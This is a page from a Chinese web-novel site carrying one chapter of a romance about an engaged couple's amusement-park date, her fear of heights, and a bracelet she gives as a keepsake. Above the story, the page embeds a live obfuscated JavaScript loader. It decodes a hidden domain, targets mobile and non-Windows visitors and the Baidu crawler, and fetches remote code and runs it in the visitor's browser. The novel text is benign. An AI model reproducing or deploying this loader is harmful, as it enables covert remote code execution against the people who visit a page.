98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuamJzZGprYmNzY2QuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(50(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

孟璟想,功课可以恶补,童年也许也可以。

不过她这个打算好像趋近落空。她带了个相机在挎包里,抓拍了未婚妻许多迷人的瞬间。喝水的时候,她翻看那些照片,射击、飞镖、碰碰车,甚至旋转木马,未婚妻美丽的眼睛虽然也偶尔闪过小星星,可也并没有那种特别欢喜到难以自持的样子。

难道是不够刺激?

做约会攻略时,她还咨询过盛雪,问在她看来,宋若会喜欢什么。

盛雪说我觉得若若喜欢安静啊。就你带她到风景名胜古迹,她可以给你看一天那种。

一天时间,旅行是不够的。

喝完水,孟璟在未婚妻跟前打个响指。

宋若朝她一望,?

我想起来有个地方,很有意思。

游乐场占地面积宽广,横跨了两座秀丽的大山。旗山是国家森林公园,有高空缆车供游客乘坐。此时漫山遍野的红叶,很是赏心悦目。这个孟璟本来是要放在最后,当成压轴节目,可是见未婚妻一直都很平静,就有了这提前献宝的想法。

然而,坐进高空缆车里的未婚妻,比原来更安静了。脸色也有点苍白。

缆车发动没多久,她亲眼看见,未婚妻啪嚓闭上了眼睛。

孟璟挪到她身边,若若?

宋若闭着眼睛,嗯。

孟璟心里拔凉拔凉的。她慢慢记起来,从到孟家第一天开始,小药瓶子下楼梯就战战兢兢。她以为是她身体差,弱柳扶风。现在看来,并不是。

你恐高?

宋若想睁开眼,并不敢,因此只是摇了摇头。摇了没两下,人就被揽进一个温柔的怀抱里。孟璟在耳边说很快就到了。忍耐一下。

接着耳朵也被两只手轻轻堵上。

这也不能怪孟璟,先前她就问过,有哪些注意事项,她并没有说。可她也无法自责,她自己都不知道,上辈子并没有恐高的毛病,也许是吊威亚出事故导致的后遗症。刚往下一看,几乎头晕目眩。

好容易踩回坚实的地面,抹香鲸的脸上写满歉疚,对不起。

我应该提前说,和你没关系。

孟璟看一眼西斜的太阳,走到未婚妻跟前半蹲下,扭头说都怪我,太粗心,我背老婆出去,当作一点小小的补偿。

宋若皱眉,都说了是我自己,起来。

两个人最终肩并肩从游乐场的西门离开。

晚饭在一家广东菜喝的靓汤。宋若本来想不吃的,做演员这行久了,挨饿是基本素养。可是孟璟坚持,要带她去吃点东西压压惊。

汤刚上来,宋若手机响,是视频申请。

孟璟坐在旁边,一眼瞥见来电的居然是秦萌。

若若秦萌的短发长长了一些,垂坠到了肩头,脸上是很雀跃的表情,忽然一变脸,由雀跃变为不愉快,啊,孟璟也在!

宋若看看抹香鲸的臭脸,尽量用公事公办的语气问秦萌,有什么事?

秦萌碎碎念说了一些最近发生的趣事,自己和妈妈搬了新公寓,遇到一个新邻居,话到一半,孟璟拿过了手机我老婆在吃饭,别打扰她,再见。

接着噼里啪啦几下,老婆我帮你拉黑她!

宋若淡淡地望着她。喝了两勺汤,放下勺子,说孟璟,我说过我有要求的。

暴躁鲸鱼立刻又化身微笑天使你说什么我都答应你。

宋若点点头,接下来我还要离开一段时间,你替我回家陪爷爷。

孟璟挑眉,小药瓶子还真厉害,她知道她会想跟她去,一句话堵死了她的后路,我不放心你。先前是不放心未婚妻一个人山水迢迢,现在想起来美帝还有秦萌那么一个祸害在,她心里藏不了事,心直口快说出来,那姓秦的,在我们家都敢打你主意,这要是我不在,她还不得

宋若没关系,她是冲你来的。

孟璟愣了愣?

而且爷爷年纪大了。宋若温和地望着鲸鱼。

孟璟闷闷的,动作幅度很大地喝了一勺汤,扔了勺子,再抬头说那你得先答应我,让小苏他们俩都跟你过去。有事都让他们去做。

宋若点头好。

孟璟也端起桌上的杯子,那就祝我们若若,拍摄顺利,早日回家团聚。

从菜馆出来,孟璟已经感到浓厚的离情别绪了。和未婚妻认识以后,除了最开始那个什么电视剧的拍摄,两个人这么几个月,几乎都是形影不离,这忽然要分别了,恰似要从心口把一株深深扎根的小树苗给连根拔起。整个儿生疼生疼。

两个人出门才发现,天上下着点小雨,孟璟让未婚妻站在廊檐下等,自己去不远处的车上拿伞过来接她。

宋若站在那儿,有个扎羊角辫的半大小女孩,胸前背着个小竹筐,边上挂着几个小饰品,亮晶晶的,声称是手工做的银饰。

她一边叫卖,一边站在了宋若跟前,定定地望着她,咧嘴而笑。

宋若打开钱包,恰好有一张粉红色的,掏出来递给了小姑娘。

孟璟回来,未婚妻看着手心一条银色手链仔细打量,眼瞳乌润,神情却呆呆的,好像不知道拿它怎么办似的。

哎,这什么?孟璟觉得好笑。

宋若看看她,刚买的。周遭望望,小女孩的身影已经不见了。

孟璟嘶了一声,朝未婚妻摊了摊手,送我。

宋若?

定情信物啊。你要离开我这么久,我心里虚飘飘的。正好,送我。我会好好珍惜的。孟璟将手再往未婚妻跟前递了递。

宋若凝视鲸鱼修长的手。三天足够改变世界。这次分别说短也不短,也许回来的时候,抹香鲸就想通了。她陡然寂寞起来。这链子,孟璟要,就给她。本来放在她手心就行,她却做了一件自己也难以解释的事。

她将链子的挂扣解开来,替她戴在手腕上。

看着未婚妻葱白的手指一波操作,把自己给栓牢了,孟璟简直心花怒放。先前说未婚妻是榆木疙瘩,错了,小药瓶子,这不挺上道的吗。系好后她还端详了一会儿,抬头汇报好了。

孟璟眼睛里盛满笑意,在未婚妻额间飞快落下一吻真乖。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间